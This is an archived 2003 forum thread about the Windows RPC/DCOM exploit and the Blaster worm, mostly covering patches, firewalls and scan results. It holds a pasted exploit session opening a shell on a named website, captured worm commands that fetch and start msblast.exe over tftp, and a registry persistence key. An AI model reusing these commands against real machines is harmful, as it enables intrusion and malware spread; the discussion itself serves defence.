Printable View
I don't know if anybody has heard of the RPC / DCOM exploit for Win2k and WinXP, but it's pretty nasty. A simple .exe will give a full shell, or dos prompt, to the host with merely the target IP and OS type (XP or 2k).
I strongly advise that everybody running XP or 2K out there run Windows Update, there is a patch for this exploit. Patch Info
Again, this is some nasty sh*t and a pretty bad exploit. Be advised.
Is this the first time this has been posted here its been around for about a week now. There is also a worm too based on the sploit the next code red maybe ?
This has been posted a couple of times before.Quote:
Originally posted here by prodikal
Is this the first time this has been posted here its been around for about a week now. There is also a worm too based on the sploit the next code red maybe ?
A simple search for 'RPC' will reveal most (if not all) the threads that discussed this vulnarability before.
I read about that 'code red' factor.
All I can say is: I am keeping my eyes on my logs'
Have a nice day.
hrrmm... quite true... but more and more script kiddies are getting their hands on the exploit, and it's getting way out of hand.
Well of-course there are about 12 proof of concepts and a worm released i seen one with 19 targets on it
heres the proof of concept
As if its hard to find a varient of it :rolleyes: and with my own testing it works fairly well if all goes well you should see
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e9afe3
- Dropping to System Shell...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
No boxes were harmed in the given example :D
Also note that this will mostly affect home users which is a bad threat with more and more home users swicthing to high speed modems imagine thousands maybe even millions of home users running a bot that connects back to an irc chan thats set-up to DoS whatever the person at the 'wheel' feels like
scary huh
yessir... i do have a copy of that code
and yes indeed, this exploit is one hell of a scary thing. full access to 90% of people with XP or 2K, crazy stuff.
Ya but as i said its only mostly home users i only know of one person whos caught a webserver with it and it was a .edu some where it's supposed to be microsofts biggest sploit in the OS yet all the more reason to swicth to *nix there is never this much wide spread panic ;)
most definately... *nix systems are far superior, but ya still almost have to have XP, especially if you're like me at college
ok lets not forget that this exploit can only work if your RPC ports are exposed which a personal firewall protects stright out of the box. i really dont see a mass stampede of users switching to linux when they can just about use windows. i can see the sale of firewalls increasing.
I really have to wonder why this fact isn't forced down the publics throat. all i keep reading is how dangerous this can be and nothing about how simple it would be to prevent it.
I dont know what this code will do 'as is' yet but the code originally posted by Xfocus will only cause svchost to crash unless the code is tweeked.
ahh... and not JUST firewalls... just about every user behind a router even is protected from this exploit
There exists a tweaked version. There is also source code for a worm.Quote:
I dont know what this code will do 'as is' yet but the code originally posted by Xfocus will only cause svchost to crash unless the code is tweeked.
And no I am not gonna link you to them.
True indeed tedob1 but not all people are computer illiterate just out of curiosity i scanned my range with nmap and out of 254 boxes there were only about 20 firewalled i didnt try to get in to any the boxes but IMO i would say at least 150 of those people would have been vulnerableQuote:
ok lets not forget that this exploit can only work if your RPC ports are exposed which a personal firewall protects stright out of the box. i really dont see a mass stampede of users switching to linux when they can just about use windows. i can see the sale of firewalls increasing.
Exactly that's who it will effevt the public. Maybe ISP's should start email all there user's telling them of this new bug in windowsQuote:
I really have to wonder why this fact isn't forced down the publics throat. all i keep reading is how dangerous this can be and nothing about how simple it would be to prevent it.
The code i posted will drop you in to a shell with the right's of the person who is logged in i tested it on a friends machine and i had a shell in like 5 secs i could tftp to it up-load what ever i wanted i could download any file i wanted as-well but untill people realise about security there isnt much people can doQuote:
I dont know what this code will do 'as is' yet but the code originally posted by Xfocus will only cause svchost to crash unless the code is tweeked.
Quote:
Originally posted here by prodikal
True indeed tedob1 but not all people are computer illiterate just out of curiosity i scanned my range with nmap and out of 254 boxes there were only about 20 firewalled i didnt try to get in to any the boxes but IMO i would say at least 150 of those people would have been vulnerable
Exactly that's who it will effevt the public. Maybe ISP's should start email all there user's telling them of this new bug in windows
The code i posted will drop you in to a shell with the right's of the person who is logged in i tested it on a friends machine and i had a shell in like 5 secs i could tftp to it up-load what ever i wanted i could download any file i wanted as-well but untill people realise about security there isnt much people can do
To be honest this code (need to be tweaked a bit first) really scary and works.. I've found 11 websites so far.. have vurnerability using this code and all of "ADM FROM THOSE WEBSITES HAVE BEEN NOTIFIED" before "THE BAD GUYS GET'S THEM".
So this is just one of example of one of those websites:
Code:#./labexploits 4 www.kghyzt.com
-Target: [Win2k-]:www.kghyzt.com:135, Bindshell:666, RET=[0x0018759f]
[+] Connected to bindshell..
-- exploits penetration succesfully --
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>label gocha
label gotcha
C:\WINNT\system32>cd\
cd\
C:\>dir
dir
Volume in drive C is gotcha
Volume Serial Number is 30A1-E843
Directory of C:\
03/27/2003 12:11p <DIR> Backup
09/19/2002 05:24p <DIR> Documents and Settings
09/19/2002 05:18p <DIR> Inetpub
09/25/2002 05:30p <DIR> MDaemon
10/31/2002 11:55p <DIR> Program Files
09/19/2002 07:50p 600 PUTTY.RND
10/10/2002 10:49p <DIR> WINNT
1 File(s) 600 bytes
6 Dir(s) 7,899,820,032 bytes free
C:\>
PS:Yes I do have permission to do penetration on those websites to prove it that code really works BUT now I have stopped to do testing again and I move on to do another thing ( my assign :) )
no friggin kidding... when I first got hold of the exploit, I used eEye's Retina scanner, which scans IP ranges looking for the vulnerability. About 32 people on my subnet alone were vulnerable... perhaps ISPs should inform their subscribersQuote:
Originally posted here by prodikal
True indeed tedob1 but not all people are computer illiterate just out of curiosity i scanned my range with nmap and out of 254 boxes there were only about 20 firewalled i didnt try to get in to any the boxes but IMO i would say at least 150 of those people would have been vulnerable
=+=+=+=+=+=+=+=+=
True indeed tedob1 but not all people are computer illiterate
=+=+=+=+=+=+=+=+=
thats my point! why isn't anyone telling them. I even heard about it on an AM news cast with no mention of what you can do execpt "ms has issued a patch". what does that mean to most users? a free firewall will peotect against most zero-day exploits unless your using web services like webserver telnet etc.
you know my whole theory on things (and this is a classic example too)... the black hats are always one step ahead of the white hats. white hats are always trying to fix what the blackhats do, while the blackhats are already getting one step ahead... which, i must say, is crap.
even little things like informing the public better could help this problem... don't just tell somebody there's a patch... tell them what the patch is for, and what somebody could do if you don't have the patch at least. dont you think that'd help things just a lil? especially if this news was told in very common places where the average joe would see... not some computer security webpage like antionline, or packetstorm... ya know?
Well tedob, you did ask if there was a tweaked version of this exploit.Quote:
Did I ask for it
There is a universal exploit that uses ExitThread instead of ExitCrash so it will not crash anything just give you a remote shell.
There is also no need to know what version the remote system is running (SP1, 2, etc)
I am not putting links here because I dont want to give it away to the so called skids (even though they will find it there selves)
It is a big security risk and I tried it on a couple of machines I was authorized to.
What frieghtens me more is that there are allready reports of a so called auto rooter in the wild and even though it will not spread at the speed of slammer I think we will be in for it later this week considering how many people are not able to patch there systems.
It is a UNIVERSAL exploit so it will affect ALL vulnarable MS systems unlike CODE RED for example.
There is also some rumours that besides the allready known ports the ports 1025-1030 are also vulnarable. I have not been able to verify this as for now. And someone mentioned that the patch does not 'patch' the vulnarability on some systems completly. The patched machine will still remain vulnarable for DoS.
The universal exploit I am talking about includes something like 48 targets (different languages) and makes them into two universal targets (Win2k /WinXP).
And for the answer you (tedob) provided in the 'how do I know if I am being hacked' thread' regarding the shutdown dialog box.
The shutdown box appeared on the original exploit. It means they got in, did what they did and closed the shell they made (invoking the ExitCrash) afaikQuote:
it does sound like someone tryed the rpc exploit. the successful ones dont pop-up a msg they just open a reverse shell. put in a firewall so the rpc ports arent exposed and keep current up on your patches
Quote:
I also ran it on an XP machine (Pro) that was up to date except for
the latest patch for RPC and it worked perfect. Telnet to port 4444
and had a shell, then as soon as I typed "exit" the host shutdown and
rebooted.
Stu
http://lists.jammed.com/incidents/2003/07/0284.html
Just to let you know.
Interesting related URL:
http://isc.sans.org/diary.html?date=2003-08-11
The folks at SANS seem to have caught a worm ... they are still working on analysis.
The way I read it is, turn of tftp outbound and you should be ok, even if you are vulnerable (this of course does NOT mean you are ok from somone attacking you)...Relevant to this worm only.
/nebulus
Interesting discussion, I have tested this exploit in a controlled environment. It is far too easy to get access. Their is a threat noone has discussed. Firewalling will keep the external threats out, but what about the joker who is employed at your company, who is already on your network. It only takes one to escalate their privelages (spelling?) and steal your company database or .......you get the picture. System Administrators need to patch all their systems regardless of their external presence.
This is what i said:
I dont know what this code will do 'as is' yet but the code originally posted by Xfocus will only cause svchost to crash unless the code is tweeked.
this is how you read it:
Well tedob, you did ask if there was a tweaked version
This is what you said:
And no I am not gonna link you to them.
this is how i read it:
And no I am not gonna link you to them.
(who the **** needs you)
and this is how i replyed:
dont you talk to me like im some ****en script kiddie!
and this is what im saying now:
WTF ive been here as a member since 2001 under the same name. came to this site before it had a bbs. Ive submitted over 2500 posts mostly trying to help some just bullshitting then some new ****en ass-hole comes along An starts insinuating im a skript kiddie. i dont think so...
And this:
The shutdown box appeared on the original exploit. It means they got in, did what they did and closed the shell they made (invoking the ExitCrash) afaik
I (not they) got this using the un-tweeked version from Xfocus on machines i set up to test this in my own network ...i was sitting there lookink at it!
Hmph, I found it interesting that this thread re-appeared today. I work as a Computer Tech at a local shop and we had about 12 phone calls and 4 computers come in today for errors due to this exploit. It seemed that it would cause a svchost error and then reboot in 60sec related to RPC. I found the patches mentioned above and they seemed to take care of any and all problems.
Note: The computers all had DSO exploit on them as well when I ran spybot
LINK: Microsoft Support Download Windows XP
my2cents
yea... about 30 seconds ago my friend was having an attack, everytime he booted his computer up.. he had to call me cause he unplugged his ethernet cable...
this is a very problematic exploit, if i must say so myself
lmao, yea it is, i have been thinking whether i should make a script that connects too all IP's , 1-255 each one, and issue commands to tftp the patch and install it.. (i won't be back to answer any opinions, real busy with programming, and working on site, www.kicktd.com ) But i will end up having legal problems, even tho i fixed their computers without any intent to harm them i still can go to jail by just entering..
Hi people!
Hispasec (www.hispasec.com) report today a new worm based on RPC exploit...
The worm send commands to windows shell in tcp port 4444.
There is captured traffic...
-------------trafic 4444/tcp----------
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.
</h2>
</body></html>
-------------tráfico 4444/tcp----------
mblast.exe is a Windows file, 6 KB len.
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
The download is from this tftp servers:
204.210.57.87
217.211.179.193
24.147.64.171
24.147.64.205
24.147.64.208
24.147.65.146
24.147.65.45
24.147.65.9
61.254.65.159
67.119.36.219
68.112.65.38
68.166.102.136
68.166.107.21
68.166.111.175
68.166.120.34
68.166.121.135
68.166.123.4
68.166.124.186
68.166.124.93
68.166.139.155
68.166.139.210
68.166.141.66
68.166.142.194
68.166.142.215
68.166.36.178
68.166.56.123
68.166.60.51
68.166.98.3
The worm make a entry in Windows registry:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"windows auto update"="msblast.exe"
****************************************************************************************
Keep the eyes open!!
See u!
Groby
nebulus200 alredy reported it here:
http://www.antionline.com/showthread...226#post651989
although your has some updated info. thanks!
you know you gotta feel sorry for the guy that looks at this list and says...my god...thats my IP address!
yea, I don't think that'd be such a good idea ;)Quote:
Originally posted here by Chinchilla06
lmao, yea it is, i have been thinking whether i should make a script that connects too all IP's , 1-255 each one, and issue commands to tftp the patch and install it.. (i won't be back to answer any opinions, real busy with programming, and working on site, www.kicktd.com ) But i will end up having legal problems, even tho i fixed their computers without any intent to harm them i still can go to jail by just entering..
most of the servers are in covad.net and attbi.com. The others are in san.rr.com and lsan03.pacbell.net. I believe that this could indicate from where it was begun to spread the worm.
Well as the debate rages I understand Teds point from the fact that and I'm not dissing anyone here he speaks from the trenches of an actual work enviroment, and that many tech workers do not understand. Ya got it Covad, Comcast, ATT etc are all infected with a worm on systems sold out of the box and subscribe to services by the above that make no mention nor provide a simple out of the box as you buy the service firewall, from either M$ or ISP yet day to day the "NOISE" of script kiddies and auto worms grow. Me I watch the logs and filter out the latest worm put in my 8 hours and have a life outside the server room. Tweak away I'll only see the tweaks those I'll watch, where the worm grows hell today on my home system 600 hits today think I'll bother to take notice other then another unsual spike. Oops did not make sense again LOL..Simple firewall takes care of it if it's blocked why sweat it...hope they did not deface the ProzacPez page :)
i just scanned a sub net of verizons where i have a remote location. i got one hit on 4444. did a GET /http1.0 and got the adsubtract response. and stopped at that.
does anyone know if this worm is using the adsubtract proxy as one of its components like some irc.backdoors use mIRC. or is it just trying to appear like an adsubtract sever (which also listens on port 4444) to avoid detection. even though chances of that are slim to none now
im tempeted (but not convinced) to d/l the dammed thing just to join the MS party on saturday.
palemoon! how in hell are you? haven't seen you in a coons age!
I did some scanning for open ports 4444 and it came up with about 1%-2% on my ISP with those ports open, but that doesn't mean that the machines are infected because lots of applications use TFTP.
IP address ranges used in seems to be the same as the original probing scans, meaning that the worm concentrates on a sort of Class B subnet of 65,536 hosts relative to itself, so if the infected PC has an IP of 12.34.56.78, it will spend most of its time scanning 12.34.x.x, some additional time scanning 12.x.x.x and then a quite small amount of time on random scanning. This is pretty similar to Code Red.
The worm will also survive a reboot (unlike Code Red). This means that it's possible for an infected laptop to bring the worm into a corporate environment if used on an insecure ISP connection and then brought into the office, neatly getting around the firewall. The scanning pattern would then be very effective at infecting a corporate network.
Reports indicate that this seems to impact XP and 2000, but not NT.
There also appears to be no email component to this.. a major threat would be if this kind of worm was combined with an email mass-mailer. Maybe the next version of this will have a mass-mailer. In any case, continue patching even if your firewall is holding.
I'm getting several probes per minute at the moment on this, I don't know about anyone else.
Tedob1 I am sorry, I did not mean to imply you are a script kiddie, I have been around the board for quite a while but I only recently signed up. I read some of your posts before and I am well aware you are a respected member of the community.
From reading your first post in this thread I got the impression that you were unaware that there was (is) a tweaked version of this exploit and I wanted to point that out.
I did not want to put in the link because that would make it to easy for the skids to get at it and I figured you would be able to find it yourself, I just wanted to share some knowledge. I think I should have made it clearer in my first post in this thread.
And for the shutdown thing, I have seen it happen right in front of me too, I believe there are quite some different versions of the exploit around.
miscommunication leads to complications.
tftp listens on port 69 adsubtract proxy and this worm listen on 4444
Just to wrap up things, www.incidents.org is I have found always a good place to look when you suspect a new worm may be on the loose (or a place to check back with). Since they receive reports from so many different places, they tend to see trends faster and are usually a couple of days ahead of the curve in announcing things like this.
Also note, that when they find a worm, they continuously update the web page as they learn more (if you look at it now, it is substantially different than when I first posted the link).
/nebulus
On a side note, about a month ago I wrote a tutorial concerning this topic. You might find it useful: http://www.antionline.com/showthread...&postid=644317
O.K,
Heres my story.
I patched all the machines with an outside connection (Proxys etc)
What happened next has taken me all day to clear.
Someone has connected in to my velocoraptor and into a terminal server.
They were infected with some bugger of a bit of code which IP scans the range they are assigned dynamically.
It then opens the exploit and downloads a copy of its self to that machine and the process starts again.
Its everywhere and the sentrys are doing overtime dealing with port requests.
wow I haven't been here since january and the constant arguing and newbie machoness hasn't changed. oh well